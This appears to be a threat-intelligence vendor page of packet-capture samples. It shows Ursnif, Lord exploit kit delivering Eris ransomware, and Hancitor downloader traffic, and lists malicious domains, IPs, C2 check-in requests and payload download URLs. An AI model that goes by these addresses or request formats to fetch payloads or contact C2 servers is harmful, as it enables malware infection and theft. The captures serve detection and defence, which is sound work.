zzz.exe Delivers Ursnif Gozi Malware Banking Trojan PCAP File Download Traffic Sample GET /mozglue.dll

Latest indicators of compromise from our Ursnif IOC feed. Ursnif (aka Gozi, aka IFSB) is a banking trojan targeting users in the USA and Europe. It was designed for the primary purpose of perpetrating fraud.

Fast, accurate identification of commodity malware like Ursnif allows SOC teams to focus efforts on hunting for more highly targeted and stealthy malware. By quickly blocking, de-prioritizing and filtering out the noise associated with mass distributed malware and crimeware, our Threat Intelligence Feed allows you to focus on the threats that matter to your organization.

2019-10-03 06:01:00.812050 IP 192.168.86.25.53425 > 104.27.161.249.80: Flags [P.], seq 3229838630:3229839201, ack 2872661083, win 16450, length 571: HTTP: GET /tmp/zzz.exe HTTP/1.1
E..cS.@….&..V.h……P..m&.9T[P.@B1<..GET /tmp/zzz.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=120970-
Unless-Modified-Since: Thu, 03 Oct 2019 02:07:13 GMT
If-Range: "1e1000-593f80b3c67d3"
Host: redmoscow.info
Connection: Keep-Alive
Cookie: __cfduid=df482dfbd65d8b46f1c87aacc388aec4a1570096931

2019-10-03 06:01:04.855775 IP 104.27.161.249.80 > 192.168.86.25.53425: Flags [P.], seq 1848473:1849587, ack 571, win 30, length 1114: HTTP
2019-10-03 06:01:19.120810 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2196019561:2196020046, ack 311058881, win 16514, length 485: HTTP: POST /223 HTTP/1.1
E…U.@…….V.h.K….P…i..a.P.@…..POST /223 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: keitbeschutzen.com
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--

2019-10-03 06:01:19.279627 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 1:314, ack 485, win 233, length 313: HTTP: HTTP/1.1 200 OK
E .a./@.1…h.K…V..P….a….NP…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2019 10:02:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

5c
0

2019-10-03 06:01:19.284253 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 485:842, ack 314, win 16435, length 357: HTTP: GET /freebl3.dll HTTP/1.1
E…U.@…. ..V.h.K….P…N..b.P.@3q7..GET /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.010931 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 264538:265974, ack 842, win 242, length 1436: HTTP
2019-10-03 06:01:20.126700 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 330594:332030, ack 842, win 242, length 1436: HTTP
2019-10-03 06:01:20.126720 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 334902:334952, ack 842, win 242, length 50: HTTP
E .Z..@.1…h.K…V..P….}…..P…e%..#j:…..9]…..’…..XC…#.#..+..9.,..I^.>….h..
2019-10-03 06:01:20.127904 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 842:1199, ack 334952, win 65047, length 357: HTTP: GET /mozglue.dll HTTP/1.1
E…Ur@…….V.h.K….P……~(P….b..GET /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.253950 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 471372:472470, ack 1199, win 250, length 1098: HTTP
2019-10-03 06:01:20.255368 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1199:1557, ack 472470, win 65338, length 358: HTTP: GET /msvcp140.dll HTTP/1.1
E…U.@…….V.h.K….P…….VP..:.O..GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:20.626528 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 912210:912940, ack 1557, win 258, length 730: HTTP
2019-10-03 06:01:20.627701 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1557:1911, ack 912940, win 65338, length 354: HTTP: GET /nss3.dll HTTP/1.1
E…V#@…….V.h.K….P…~..O.P..:….GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.378227 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2159388:2159452, ack 1911, win 267, length 64: HTTP
2019-10-03 06:01:21.379453 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1911:2269, ack 2159452, win 65322, length 358: HTTP: GET /softokn3.dll HTTP/1.1
E…Wt@…….V.h.K….P……U.P..….GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.529860 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2304488:2304650, ack 2269, win 275, length 162: HTTP
2019-10-03 06:01:21.530760 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2269:2631, ack 2304650, win 65338, length 362: HTTP: GET /vcruntime140.dll HTTP/1.1
E…W.@…….V.h.K….P…F…JP..:5;..GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.660746 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
2019-10-03 06:01:21.989504 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP

Lord Exploit Kit Exploiting Flash Vulnerability Delivering Eris Ransomware PCAP File Download Traffic Sample

2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E..m.y@…..
..e…….PM….Hg.P…….GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 57189bbb.ngrok.io

2019-08-02 10:46:29.501716 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 326, win 64240, length 0
E..(……U…..
..e.P…Hg.M..$P…l…
2019-08-02 10:46:29.666953 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………PB….
..e.P…Hg.M..$P…….HTTP/1.1 200 OK
Date: Fri, 02 Aug 2019 14:46:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91

2019-08-02 10:46:31.239216 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [.], ack 21872, win 64240, length 0
E..(..@…..
..e…….PM….H.tP…….
2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
E..,..@…..
..e…….PM….H.tP…OC..GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://57189bbb.ngrok.io/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3
x-flash-version: 28,0,0,161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:46:31.298032 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 2571, win 64240, length 0
E..(……U…..
..e.P…H.tM…P…….
2019-08-02 10:46:31.441240 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 21872:23332, ack 2571, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………P…..
..e.P…H.tM…P…+…HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Date: Fri, 02 Aug 2019 14:46:30 GMT
Transfer-Encoding: chunked

2475
FWS$u$..x……p…..D………..application/x-shockwave-flashAdobe Flex 4 Applicationhttp://www.adobe.com/products/flexujwkgkcujwkgkcENSep 15, 2014.D…<.C….Z

2019-08-02 10:47:11.656373 IP 10.8.2.101.49175 > 3.14.212.173.80: Flags [P.], seq 1:724, ack 1, win 64240, length 723: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E…..@…..
..e…….PjTPv….P…>…GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:47:11.656449 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [.], ack 724, win 64240, length 0
E..(.R….PV….
..e.P……jTSIP….a..
2019-08-02 10:47:11.842604 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [P.], seq 1:189, ack 724, win 64240, length 188: HTTP: HTTP/1.1 302 Found
E….T….O…..
..e.P……jTSIP…I…HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: http://google.com
Date: Fri, 02 Aug 2019 14:47:11 GMT
Content-Length: 40

Found.

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E…..@…{.
..eQ……….`.2.”P….+..GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-02 10:46:31.800983 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], ack 133, win 64240, length 0
E..(……..Q…
..e…..2.”….P…G…
2019-08-02 10:46:31.977210 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [P.], seq 1:326, ack 133, win 64240, length 325
E..m……..Q…
..e…..2.”….P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1803776
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.176216669380665; path=/; HttpOnly
ETag: 60A4822263437E51F0D4844D638C4DFA
Last-Modified: Fri, 02 Aug 2019 12:38:10 GMT
Content-Disposition: attachment; filename="Server.exe";

2019-08-02 10:46:34.864608 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 601786:603246, ack 133, win 64240, length 1460
2019-08-02 10:46:34.864636 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 603246:604706, ack 133, win 64240, length 1460
2019-08-02 10:46:34.864652 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 604706:606166, ack 133, win 64240, length 1460
2019-08-02 10:46:34.864666 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 606166:607626, ack 133, win 64240, length 1460

2019-08-02 10:46:41.513341 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1:304, ack 1, win 64240, length 303: HTTP: POST /api/v1/check HTTP/1.1
E..W..@…..
..e..P0…P..%..>C.P….K..POST /api/v1/check HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 26
Accept-Encoding: gzip

{"uid":"d708005f8b8c91d1"}
2019-08-02 10:46:50.050263 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 1:466, ack 304, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….I……..P0
..e.P…>C…&0P…q|..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=2ri00afk3bqb48pn4fg6sde643; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0

{"response":"","code":0}

2019-08-02 10:46:50.050886 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [.], seq 304:1764, ack 466, win 63775, length 1460: HTTP: POST /api/v1/sync HTTP/1.1
E…..@…..
..e..P0…P..&0.>E.P…….POST /api/v1/sync HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 1844
Accept-Encoding: gzip

2019-08-02 10:46:50.050909 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1764:2426, ack 466, win 63775, length 662: HTTP
E…..@…..
..e..P0…P..+..>E.P….~….
2019-08-02 10:46:50.050978 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 1764, win 64240, length 0
E..(.J……..P0
..e.P…>E…+.P….f..
2019-08-02 10:46:50.051038 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 2426, win 64240, length 0
E..(.K……..P0
..e.P…>E….zP…….
2019-08-02 10:46:58.858491 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 466:931, ack 2426, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….N……..P0
..e.P…>E….zP…W…HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=s59ap5rdus4stk4ds1i5hfsmh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache

NEW Flash Exploiting Lord EK Exploit Kit Found in the Wild PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe’s Flash Player, Malwarebytes security researchers say.

Dubbed "Lord," the exploit kit (EK) was initially identified by Virus Bulletin's Adrian Luca. The toolkit emerged as part of a malvertising chain via the PopCash ad network.

The EK uses a compromised website to redirect unsuspecting victims to its landing page. Initially, the portal was rather rudimentary and in clear text, but the toolkit operators quickly moved to obfuscate it.

The landing page has a function to check for the presence of Flash Player, in an attempt to exploit the CVE-2018-15982 vulnerability. One thing that sets the Lord EK apart from other toolkits is its use of the ngrok service to craft custom hostnames, which resulted in rather unusual URLs. Source: https://www.securityweek.com/new-lord-exploit-kit-emerges

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
E..?.s….#.
..f
….F.5.+……………7b2cdd48.ngrok.io…..
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
E..O!……U

..f.5.F.;……………7b2cdd48.ngrok.io…………………
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.t@…!P
..f…….P.v[x…… .s……………
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
E..,!…..?…..
..f.P….+..v[y`………..
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
E..(.w@…!Y
..f…….P.v[y..+.P…….
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
E..m.x@… .
..f…….P.v[y..+.P…….GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
E..(!…..?…..
..f.P….+..v.P….t..
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…!…..:E….
..f.P….+..v.P….-..HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



Hancitor Amadey Pony Malware Trojan Downloader Cobalt-Strike PCAP Download Traffic Sample todratsake.ru 31.44.184.33

2019-07-25 13:00:40.697356 IP 10.7.25.101.54392 > 10.7.25.1.53: 3214+ A? codeotso.com. (30)
2019-07-25 13:00:40.963731 IP 10.7.25.1.53 > 10.7.25.101.54392: 3214 1/0/0 A 83.220.175.185 (46)
2019-07-25 13:00:40.988041 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [S], seq 1865439027, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-25 13:00:41.166747 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [S.], seq 1917710723, ack 1865439028, win 64240, options [mss 1460], length 0
2019-07-25 13:00:41.167101 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&

2019-07-25 13:00:41.167370 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [.], ack 231, win 64240, length 0
2019-07-25 13:00:41.371519 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [P.], seq 1:257, ack 231, win 64240, length 256: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

40
1000094001http://material-nerud.ru/wp-includes/pomo/p.exe#
0

2019-07-25 13:00:41.699548 IP 10.7.25.1.53 > 10.7.25.101.51988: 29514 1/0/0 A 77.120.115.221 (48)
2019-07-25 13:00:41.701189 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [S], seq 1365560241, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-25 13:00:41.795556 IP 10.7.25.1.53 > 10.7.25.101.54927: 19539 1/0/0 A 92.53.96.153 (51)
2019-07-25 13:00:41.879144 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [S.], seq 172257877, ack 1365560242, win 64240, options [mss 1460], length 0
2019-07-25 13:00:41.879331 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:00:41.879428 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [P.], seq 1:233, ack 1, win 64240, length 232: HTTP: POST /f5lkB/index.php HTTP/1.1
POST /f5lkB/index.php HTTP/1.1
Host: fordifortti.ru
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&

2019-07-25 13:00:41.879503 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 233, win 64240, length 0
2019-07-25 13:00:41.943752 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [S], seq 3529323204, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-25 13:00:42.103552 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [S.], seq 2378334524, ack 3529323205, win 64240, options [mss 1460], length 0
2019-07-25 13:00:42.103869 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1
GET /wp-includes/pomo/p.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: material-nerud.ru
Connection: Keep-Alive

2019-07-25 13:00:42.104455 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [.], ack 327, win 64240, length 0
2019-07-25 13:00:42.113973 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [P.], seq 1:198, ack 233, win 64240, length 197: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

6

0

2019-07-25 13:00:42.114334 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [F.], seq 233, ack 198, win 64043, length 0
2019-07-25 13:00:42.114462 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 234, win 64239, length 0
2019-07-25 13:00:42.275225 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [P.], seq 1:1347, ack 327, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: application/octet-stream
Content-Length: 300032
Last-Modified: Thu, 25 Jul 2019 14:50:21 GMT
Connection: keep-alive
ETag: "5d39c1ad-49400"
Expires: Sun, 25 Aug 2019 17:00:35 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

2019-07-25 13:05:46.182168 IP 10.7.25.101.49179 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.182269 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [.], ack 342, win 64240, length 0
2019-07-25 13:05:46.184001 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [S.], seq 2287068635, ack 1286805230, win 64240, options [mss 1460], length 0
2019-07-25 13:05:46.184189 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:05:46.184358 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.184449 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [.], ack 342, win 64240, length 0
2019-07-25 13:05:46.211149 IP 83.220.175.185.80 > 10.7.25.101.49178: Flags [FP.], seq 198, ack 232, win 64239, length 0
2019-07-25 13:05:46.211404 IP 10.7.25.101.49178 > 83.220.175.185.80: Flags [.], ack 199, win 64043, length 0
